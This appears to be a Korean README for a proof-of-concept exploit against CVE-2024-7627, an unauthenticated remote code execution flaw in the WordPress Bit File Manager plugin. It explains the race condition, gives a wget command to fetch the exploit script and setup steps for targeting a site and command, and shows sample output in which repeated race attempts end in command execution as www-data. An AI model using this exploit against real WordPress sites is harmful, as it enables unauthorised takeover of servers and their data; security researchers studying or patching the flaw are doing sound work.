
WordPress 플러그인 Bit File Manager 버전 6.0 - 6.5.5의 인증되지 않은 원격 코드 실행 취약점 (CVE-2024-7627, 경쟁 조건을 통한)에 대한 PoC 스크립트
이 PoC(Proof-of-Concept) 스크립트는 WordPress 플러그인 Bit File Manager 버전 6.0~6.5.5의 인증되지 않은 원격 코드 실행(Race Condition을 통한)(CVE-2024-7627) 취약점을 위한 것입니다.
설명:
WordPress용 Bit File Manager 플러그인은 'checkSyntax' 함수를 통해 버전 6.0~6.5.5에서 원격 코드 실행에 취약합니다. 이는 파일 유효성 검사를 수행하기 전에 임시 파일을 공개적으로 접근 가능한 디렉터리에 쓰기 때문입니다. 이로 인해 관리자가 게스트 사용자 읽기 권한을 허용한 경우 인증되지 않은 공격자가 서버에서 코드를 실행할 수 있습니다. (출처: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-manager/bit-file-manager-60-655-unauthenticated-remote-code-execution-via-race-condition)
wget https://raw.githubusercontent.com/siunam321/CVE-2024-7627-PoC/main/poc.py
file-manager가 관리자에 의해 이미 설정되어 있어야 합니다.Python 스크립트 poc.py의 targetBaseUrl, fileManagerPostPath, commandToExecute를 원하는 값으로 업데이트하세요. 그런 다음 python3 poc.py를 실행하여 PoC 스크립트를 실행합니다.
예제 출력:
└> python3 poc.py
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: f3128b289e
[*] Getting a random file's hash via elFinder command "open"...
[+] Found file "wp-config-sample.php" with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA"!
[*] Editing file with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA" via elFinder command "put" and getting the edited temporary PHP file at "http://localhost/wp-content/uploads/file-managertemp.php"...
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[+] We won the race condition! Here's the PHP payload result:
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
8d3b2776e8a6